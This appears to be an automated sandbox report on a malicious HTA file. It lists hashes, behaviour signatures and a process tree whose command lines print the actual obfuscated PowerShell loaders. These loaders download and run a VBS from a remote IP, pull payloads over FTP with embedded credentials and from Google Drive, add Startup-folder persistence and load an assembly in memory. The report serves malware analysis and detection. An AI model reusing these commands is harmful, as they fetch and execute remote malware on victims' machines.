Analysis

max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-10-2024 06:48

Static task: static1

Behavioral task: behavioral1
  Sample: necgoodthingswithgreatthingsentirethingstobeinonline.hta
  Resource: win7-20241010-en

Behavioral task: behavioral2
  Sample: necgoodthingswithgreatthingsentirethingstobeinonline.hta
  Resource: win10v2004-20241007-en
General

Target: necgoodthingswithgreatthingsentirethingstobeinonline.hta
Size: 130KB
MD5: 611e9ca8b26d298c4d384206e385e10c
SHA1: 73544dca3a9bd4907bd4c9027b0468b0f8094173
SHA256: db31b117dac71c5b27b572527b40c756df4c04b94e33dafc6e798dff6c69e904
SHA512: 8c47b4d1a5419c1828ca4efaeeffc19a843a7f52113b5ebe2a5ff0a9bb385121496e6c56c8666414652f856d743de3e92c49ba9ab2cdad4124a9a75a2cae64d5
SSDEEP: 96:Eam7kD8LnZNp6D8OknZNpjwoOoYRMOD8ldD82q3bZknZNpAuED8r7T:Ea2kYNv6Ydvj9GYnY6vvEYXT
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Signatures

Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  22    1384  PoWERSHelL.EXe
  25    4932  powershell.exe

Evasion via Device Credential Deployment (2 IoCs)
  pid   Process
  3432  powershell.exe
  1384  PoWERSHelL.EXe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence.
  description        ioc                                                                                                 Process
  Key value queried  \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation  mshta.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation  WScript.exe

Command and Scripting Interpreter: PowerShell (2 IoCs)
  pid   Process
  4400  powershell.exe
  4932  powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 8 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  PoWERSHelL.EXe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe

Modifies registry class (1 IoCs)
  description  ioc                                                                                  Process
  Key created  \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings  PoWERSHelL.EXe

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid   Process
  1384  PoWERSHelL.EXe
  1384  PoWERSHelL.EXe
  3432  powershell.exe
  3432  powershell.exe
  4400  powershell.exe
  4400  powershell.exe
  4932  powershell.exe
  4932  powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1384  PoWERSHelL.EXe
  Token: SeDebugPrivilege  3432  powershell.exe
  Token: SeDebugPrivilege  4400  powershell.exe
  Token: SeDebugPrivilege  4932  powershell.exe

Suspicious use of WriteProcessMemory (21 IoCs)
  description                        pid   Process         procid_target
  PID 4812 wrote to memory of 1384   4812  mshta.exe       84
  PID 4812 wrote to memory of 1384   4812  mshta.exe       84
  PID 4812 wrote to memory of 1384   4812  mshta.exe       84
  PID 1384 wrote to memory of 3432   1384  PoWERSHelL.EXe  89
  PID 1384 wrote to memory of 3432   1384  PoWERSHelL.EXe  89
  PID 1384 wrote to memory of 3432   1384  PoWERSHelL.EXe  89
  PID 1384 wrote to memory of 940    1384  PoWERSHelL.EXe  93
  PID 1384 wrote to memory of 940    1384  PoWERSHelL.EXe  93
  PID 1384 wrote to memory of 940    1384  PoWERSHelL.EXe  93
  PID 940 wrote to memory of 2136    940   csc.exe         94
  PID 940 wrote to memory of 2136    940   csc.exe         94
  PID 940 wrote to memory of 2136    940   csc.exe         94
  PID 1384 wrote to memory of 1908   1384  PoWERSHelL.EXe  99
  PID 1384 wrote to memory of 1908   1384  PoWERSHelL.EXe  99
  PID 1384 wrote to memory of 1908   1384  PoWERSHelL.EXe  99
  PID 1908 wrote to memory of 4400   1908  WScript.exe     100
  PID 1908 wrote to memory of 4400   1908  WScript.exe     100
  PID 1908 wrote to memory of 4400   1908  WScript.exe     100
  PID 4400 wrote to memory of 4932   4400  powershell.exe  102
  PID 4400 wrote to memory of 4932   4400  powershell.exe  102
  PID 4400 wrote to memory of 4932   4400  powershell.exe  102
Processes

[1] C:\Windows\SysWOW64\mshta.exe
    Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\necgoodthingswithgreatthingsentirethingstobeinonline.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    Signatures:
      - Checks computer location settings
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
    PID: 4812
C:\Windows\SysWOW64\wiNDOwspowerSHEll\V1.0\PoWERSHelL.EXe"C:\Windows\SysteM32\wiNDOwspowerSHEll\V1.0\PoWERSHelL.EXe" "POweRsHEll -Ex BYPAss -noP -W 1 -C dEVICECrEDenTialdepLOymENt.ExE ; iEx($(ieX('[SySTem.tExt.enCoding]'+[Char]58+[CHAr]58+'Utf8.GetsTriNG([SyStEM.Convert]'+[CHAR]0x3A+[CHAr]0X3A+'frOmbAsE64STrING('+[CHAR]34+'JEU0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJFUmRFZkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWp6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZG1OT1FIT2p6cWUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6em9sbkwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJzanhDYlhYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhjbEFNQU92RUVXIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFpabWloUyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEU0OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTQuMTcxLjE1Ny82ODAvc3lzdGVtcHJvZy52YnMiLCIkRW52OkFQUERBVEFcc3lzdGVtcHJvZy52YnMiLDAsMCk7c1RhUnQtU0xFZXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc3lzdGVtcHJvZy52YnMi'+[CHaR]34+'))')))"2⤵
        Signatures:
          - Blocklisted process makes network request
          - Evasion via Device Credential Deployment
          - System Location Discovery: System Language Discovery
          - Modifies registry class
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
        PID: 1384
        [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPAss -noP -W 1 -C dEVICECrEDenTialdepLOymENt.ExE
            Signatures:
              - Evasion via Device Credential Deployment
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            PID: 3432
        [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\32u5r4sr\32u5r4sr.cmdline"
            Signatures:
              - System Location Discovery: System Language Discovery
              - Suspicious use of WriteProcessMemory
            PID: 940
            [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9BB3.tmp" "c:\Users\Admin\AppData\Local\Temp\32u5r4sr\CSC44760F551A4448F4903D67DFB4E25E0.TMP"
                Signatures:
                  - System Location Discovery: System Language Discovery
                PID: 2136
        [3] C:\Windows\SysWOW64\WScript.exe
            Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\systemprog.vbs"
            Signatures:
              - Checks computer location settings
              - System Location Discovery: System Language Discovery
              - Suspicious use of WriteProcessMemory
            PID: 1908
            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = '<long obfuscated base64 string, omitted here>';$hlwnc = $qKKzc; ;$hlwnc = $qKKzc.replace('уЦϚ' , 'B') ;;$jwvqp = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $hlwnc ) ); $jwvqp = $jwvqp[-1..-$jwvqp.Length] -join '';$jwvqp = $jwvqp.replace('%XRqhI%','C:\Users\Admin\AppData\Roaming\systemprog.vbs');powershell $jwvqp
                Signatures:
                  - Command and Scripting Interpreter: PowerShell
                  - System Location Discovery: System Language Discovery
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  - Suspicious use of WriteProcessMemory
                PID: 4400
                [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$thdnq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$thdnq = ($thdnq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$thdnq = ($thdnq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$nfvjp = (New-Object Net.WebClient);$nfvjp.Encoding = [System.Text.Encoding]::UTF8;$nfvjp.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Roaming\systemprog.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zpdyg = (New-Object Net.WebClient);$zpdyg.Encoding = [System.Text.Encoding]::UTF8;$zpdyg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $zpdyg.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$zpdyg.dispose();$zpdyg = (New-Object Net.WebClient);$zpdyg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zpdyg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Roaming\systemprog.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.lldevitca/9.4.371.701//:ptth' , $huUPX , 'D D1D' ) );};"
                    Signatures:
                      - Blocklisted process makes network request
                      - Command and Scripting Interpreter: PowerShell
                      - System Location Discovery: System Language Discovery
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken
                    PID: 4932
Network
MITRE ATT&CK Enterprise v15
Downloads